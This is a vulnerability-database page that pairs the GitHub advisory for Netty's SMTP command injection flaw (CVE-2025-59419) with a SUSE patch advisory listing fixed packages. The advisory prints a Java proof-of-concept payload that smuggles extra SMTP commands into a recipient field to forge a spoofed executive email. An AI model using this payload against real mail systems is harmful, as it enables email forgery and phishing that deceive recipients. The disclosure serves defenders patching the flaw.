An SMTP Command Injection (CRLF Injection) vulnerability in Netty's SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications.

Details

The root cause is the lack of input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters.

The vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command.

Because the injected commands are sent from the server's trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim's email client.

PoC

A minimal PoC involves passing a crafted string containing CRLF sequences to any SmtpRequest that accepts user-controlled parameters.

1. Malicious Payload

The core of the exploit is the payload, where new SMTP commands are injected into a parameter.

// The legitimate recipient is followed by an injected email sequence
String injected_recipient = "legit-recipient@example.com\r\n" +
                          "MAIL FROM:<ceo@trusted-domain.com>\r\n" +
                          "RCPT TO:<victim@anywhere.com>\r\n" +
                          "DATA\r\n" +
                          "From: ceo@trusted-domain.com\r\n" +
                          "To: victim@anywhere.com\r\n" +
                          "Subject: Urgent: Phishing Email\r\n" +
                          "\r\n" +
                          "This is a forged email that will pass authentication checks.\r\n" +
                          ".\r\n" +
                          "QUIT\r\n";

2. Triggering the Vulnerability

The vulnerability is triggered when this payload is used to create an SMTP request.

// The Netty SMTP codec will fail to sanitize this input
SmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient);

// When this request is sent to an SMTP server, the injected commands
// will be executed, sending a forged email.
channel.writeAndFlush(maliciousRequest);

3. Full Reproduction Steps

A complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server

Full PoC Code: https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c

To run the full PoC:

Set up a local SMTP server. The easiest way is using MailHog:
- On macOS: brew install mailhog && mailhog
- Using Docker: docker run -p 1025:1025 -p 8025:8025 mailhog/mailhog
Run the PoC code. The code will connect to the SMTP server at localhost:1025 and send the malicious payload.
Verify the result. Open the MailHog web UI at http://localhost:8025. You will see the forged email sent to victim@anywhere.com from ceo@trusted-domain.com.

Impact

This is a SMTP Command Injection vulnerability. It impacts any application using netty-codec-smtp to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., from, recipient, helo hostname).

The primary impacts are: * Economic Manipulation & Disinformation: Attackers can forge emails from high-value targets (e.g., corporate executives, government officials) and send them to journalists, financial institutions, or the public. A fraudulent email announcing false financial results, a fake merger, or a security breach could be used to manipulate stock prices or cause significant economic disruption. * Sophisticated Phishing: Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.

Severity ?

7.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-codec-smtp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.2.0.Alpha1"
            },
            {
              "fixed": "4.2.7.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-codec-smtp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.128.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59419"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-15T17:12:55Z",
    "nvd_published_at": "2025-10-15T16:15:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn SMTP Command Injection (CRLF Injection) vulnerability in Netty\u0027s SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications.\n\n### Details\nThe root cause is the lack of input validation for Carriage Return (\\r) and Line Feed (\\n) characters in user-supplied parameters.\n\nThe vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command.\n\nBecause the injected commands are sent from the server\u0027s trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim\u0027s email client.\n\n### PoC\nA minimal PoC involves passing a crafted string containing CRLF sequences to any `SmtpRequest` that accepts user-controlled parameters.\n\n**1. Malicious Payload**\n\nThe core of the exploit is the payload, where new SMTP commands are injected into a parameter.\n\n```java\n// The legitimate recipient is followed by an injected email sequence\nString injected_recipient = \"legit-recipient@example.com\\r\\n\" +\n                          \"MAIL FROM:\u003cceo@trusted-domain.com\u003e\\r\\n\" +\n                          \"RCPT TO:\u003cvictim@anywhere.com\u003e\\r\\n\" +\n                          \"DATA\\r\\n\" +\n                          \"From: ceo@trusted-domain.com\\r\\n\" +\n                          \"To: victim@anywhere.com\\r\\n\" +\n                          \"Subject: Urgent: Phishing Email\\r\\n\" +\n                          \"\\r\\n\" +\n                          \"This is a forged email that will pass authentication checks.\\r\\n\" +\n                          \".\\r\\n\" +\n                          \"QUIT\\r\\n\";\n```\n\n**2. Triggering the Vulnerability**\n\nThe vulnerability is triggered when this payload is used to create an SMTP request.\n\n```java\n// The Netty SMTP codec will fail to sanitize this input\nSmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient);\n\n// When this request is sent to an SMTP server, the injected commands\n// will be executed, sending a forged email.\nchannel.writeAndFlush(maliciousRequest);\n```\n\n**3. Full Reproduction Steps**\n\nA complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server\n\n*   **Full PoC Code:** https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c\n\nTo run the full PoC:\n\n1.  **Set up a local SMTP server.** The easiest way is using MailHog:\n    *   On macOS: `brew install mailhog \u0026\u0026 mailhog`\n    *   Using Docker: `docker run -p 1025:1025 -p 8025:8025 mailhog/mailhog`\n2.  **Run the PoC code.** The code will connect to the SMTP server at `localhost:1025` and send the malicious payload.\n3.  **Verify the result.** Open the MailHog web UI at `http://localhost:8025`. You will see the forged email sent to `victim@anywhere.com` from `ceo@trusted-domain.com`.\n\n### Impact\nThis is a SMTP Command Injection vulnerability. It impacts any application using `netty-codec-smtp` to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., `from`, `recipient`, `helo` hostname).\n\nThe primary impacts are:\n*   **Economic Manipulation \u0026 Disinformation:** Attackers can forge emails from high-value targets (e.g., corporate executives, government officials) and send them to journalists, financial institutions, or the public. A fraudulent email announcing false financial results, a fake merger, or a security breach could be used to manipulate stock prices or cause significant economic disruption.\n*   **Sophisticated Phishing:** Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.",
  "id": "GHSA-jq43-27x9-3v86",
  "modified": "2025-10-17T21:32:39Z",
  "published": "2025-10-15T17:12:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59419"
    },
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120"
    },
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/commit/2b3fddd3339cde1601f622b9ce5e54c39f24c3f9"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/netty/netty"
    },
    {
      "type": "WEB",
      "url": "https://www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Netty has SMTP Command Injection Vulnerability that Allows Email Forgery"
}

SUSE-SU-2025:4087-1

Vulnerability from csaf_suse - Published: 2025-11-12 19:35 - Updated: 2025-11-12 19:35

Summary

Security update for netty, netty-tcnative

Notes

Title of the patch

Security update for netty, netty-tcnative

Description of the patch

This update for netty, netty-tcnative fixes the following issues: - CVE-2025-59419: fixed SMTP command injection vulnerability that allowed email forgery (bsc#1252097)

Patchnames

SUSE-2025-4087,SUSE-SLE-Module-Development-Tools-15-SP6-2025-4087,SUSE-SLE-Module-Development-Tools-15-SP7-2025-4087,SUSE-SLE-Module-Packagehub-Subpackages-15-SP6-2025-4087,SUSE-SLE-Module-Packagehub-Subpackages-15-SP7-2025-4087,openSUSE-SLE-15.6-2025-4087

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Security update for netty, netty-tcnative",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "This update for netty, netty-tcnative fixes the following issues:\n\n  - CVE-2025-59419: fixed SMTP command injection vulnerability that allowed email forgery (bsc#1252097)\n",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "SUSE-2025-4087,SUSE-SLE-Module-Development-Tools-15-SP6-2025-4087,SUSE-SLE-Module-Development-Tools-15-SP7-2025-4087,SUSE-SLE-Module-Packagehub-Subpackages-15-SP6-2025-4087,SUSE-SLE-Module-Packagehub-Subpackages-15-SP7-2025-4087,openSUSE-SLE-15.6-2025-4087",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_4087-1.json"
      },
      {
        "category": "self",
        "summary": "URL for SUSE-SU-2025:4087-1",
        "url": "https://www.suse.com/support/update/announcement/2025/suse-su-20254087-1/"
      },
      {
        "category": "self",
        "summary": "E-Mail link for SUSE-SU-2025:4087-1",
        "url": "https://lists.suse.com/pipermail/sle-security-updates/2025-November/023274.html"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1252097",
        "url": "https://bugzilla.suse.com/1252097"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-59419 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-59419/"
      }
    ],
    "title": "Security update for netty, netty-tcnative",
    "tracking": {
      "current_release_date": "2025-11-12T19:35:11Z",
      "generator": {
        "date": "2025-11-12T19:35:11Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "SUSE-SU-2025:4087-1",
      "initial_release_date": "2025-11-12T19:35:11Z",
      "revision_history": [
        {
          "date": "2025-11-12T19:35:11Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-150200.4.37.1.aarch64",
                "product": {
                  "name": "netty-4.1.128-150200.4.37.1.aarch64",
                  "product_id": "netty-4.1.128-150200.4.37.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-2.0.74-150200.3.33.1.aarch64",
                "product": {
                  "name": "netty-tcnative-2.0.74-150200.3.33.1.aarch64",
                  "product_id": "netty-tcnative-2.0.74-150200.3.33.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.aarch64",
                "product": {
                  "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.aarch64",
                  "product_id": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-150200.4.37.1.i586",
                "product": {
                  "name": "netty-4.1.128-150200.4.37.1.i586",
                  "product_id": "netty-4.1.128-150200.4.37.1.i586"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-2.0.74-150200.3.33.1.i586",
                "product": {
                  "name": "netty-tcnative-2.0.74-150200.3.33.1.i586",
                  "product_id": "netty-tcnative-2.0.74-150200.3.33.1.i586"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.i586",
                "product": {
                  "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.i586",
                  "product_id": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.i586"
                }
              }
            ],
            "category": "architecture",
            "name": "i586"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-bom-4.1.128-150200.4.37.1.noarch",
                "product": {
                  "name": "netty-bom-4.1.128-150200.4.37.1.noarch",
                  "product_id": "netty-bom-4.1.128-150200.4.37.1.noarch"
                }
              },
              {
                "category": "product_version",
                "name": "netty-javadoc-4.1.128-150200.4.37.1.noarch",
                "product": {
                  "name": "netty-javadoc-4.1.128-150200.4.37.1.noarch",
                  "product_id": "netty-javadoc-4.1.128-150200.4.37.1.noarch"
                }
              },
              {
                "category": "product_version",
                "name": "netty-parent-4.1.128-150200.4.37.1.noarch",
                "product": {
                  "name": "netty-parent-4.1.128-150200.4.37.1.noarch",
                  "product_id": "netty-parent-4.1.128-150200.4.37.1.noarch"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch",
                "product": {
                  "name": "netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch",
                  "product_id": "netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch"
                }
              }
            ],
            "category": "architecture",
            "name": "noarch"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-150200.4.37.1.ppc64le",
                "product": {
                  "name": "netty-4.1.128-150200.4.37.1.ppc64le",
                  "product_id": "netty-4.1.128-150200.4.37.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
                "product": {
                  "name": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
                  "product_id": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.ppc64le",
                "product": {
                  "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.ppc64le",
                  "product_id": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-150200.4.37.1.s390x",
                "product": {
                  "name": "netty-4.1.128-150200.4.37.1.s390x",
                  "product_id": "netty-4.1.128-150200.4.37.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-2.0.74-150200.3.33.1.s390x",
                "product": {
                  "name": "netty-tcnative-2.0.74-150200.3.33.1.s390x",
                  "product_id": "netty-tcnative-2.0.74-150200.3.33.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.s390x",
                "product": {
                  "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.s390x",
                  "product_id": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-150200.4.37.1.x86_64",
                "product": {
                  "name": "netty-4.1.128-150200.4.37.1.x86_64",
                  "product_id": "netty-4.1.128-150200.4.37.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-2.0.74-150200.3.33.1.x86_64",
                "product": {
                  "name": "netty-tcnative-2.0.74-150200.3.33.1.x86_64",
                  "product_id": "netty-tcnative-2.0.74-150200.3.33.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.x86_64",
                "product": {
                  "name": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.x86_64",
                  "product_id": "netty-tcnative-openssl-dynamic-2.0.74-150200.3.33.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "SUSE Linux Enterprise Module for Development Tools 15 SP6",
                "product": {
                  "name": "SUSE Linux Enterprise Module for Development Tools 15 SP6",
                  "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP6",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:suse:sle-module-development-tools:15:sp6"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
                "product": {
                  "name": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
                  "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:suse:sle-module-development-tools:15:sp7"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "SUSE Linux Enterprise Module for Package Hub 15 SP6",
                "product": {
                  "name": "SUSE Linux Enterprise Module for Package Hub 15 SP6",
                  "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP6",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:suse:packagehub:15:sp6"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
                "product": {
                  "name": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
                  "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:suse:packagehub:15:sp7"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "openSUSE Leap 15.6",
                "product": {
                  "name": "openSUSE Leap 15.6",
                  "product_id": "openSUSE Leap 15.6",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:leap:15.6"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.aarch64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.aarch64"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.aarch64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le as component of SUSE Linux Enterprise Module for Development Tools 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.ppc64le"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.s390x as component of SUSE Linux Enterprise Module for Development Tools 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.s390x"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.s390x",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.x86_64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.x86_64"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.x86_64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.aarch64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.aarch64"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.aarch64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.ppc64le"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.s390x as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.s390x"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.s390x",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.x86_64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.x86_64"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.x86_64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.aarch64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.aarch64"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.aarch64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.ppc64le as component of SUSE Linux Enterprise Module for Package Hub 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.ppc64le"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.ppc64le",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.s390x as component of SUSE Linux Enterprise Module for Package Hub 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.s390x"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.s390x",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.x86_64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.x86_64"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.x86_64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-javadoc-4.1.128-150200.4.37.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP6",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-javadoc-4.1.128-150200.4.37.1.noarch"
        },
        "product_reference": "netty-javadoc-4.1.128-150200.4.37.1.noarch",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.aarch64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.aarch64"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.aarch64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.ppc64le as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.ppc64le"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.ppc64le",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.s390x as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.s390x"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.s390x",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.x86_64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.x86_64"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.x86_64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-javadoc-4.1.128-150200.4.37.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.128-150200.4.37.1.noarch"
        },
        "product_reference": "netty-javadoc-4.1.128-150200.4.37.1.noarch",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.aarch64 as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.aarch64"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.aarch64",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.ppc64le as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.ppc64le"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.ppc64le",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.s390x as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.s390x"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.s390x",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-150200.4.37.1.x86_64 as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.x86_64"
        },
        "product_reference": "netty-4.1.128-150200.4.37.1.x86_64",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-javadoc-4.1.128-150200.4.37.1.noarch as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-javadoc-4.1.128-150200.4.37.1.noarch"
        },
        "product_reference": "netty-javadoc-4.1.128-150200.4.37.1.noarch",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.aarch64 as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.aarch64"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.aarch64",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
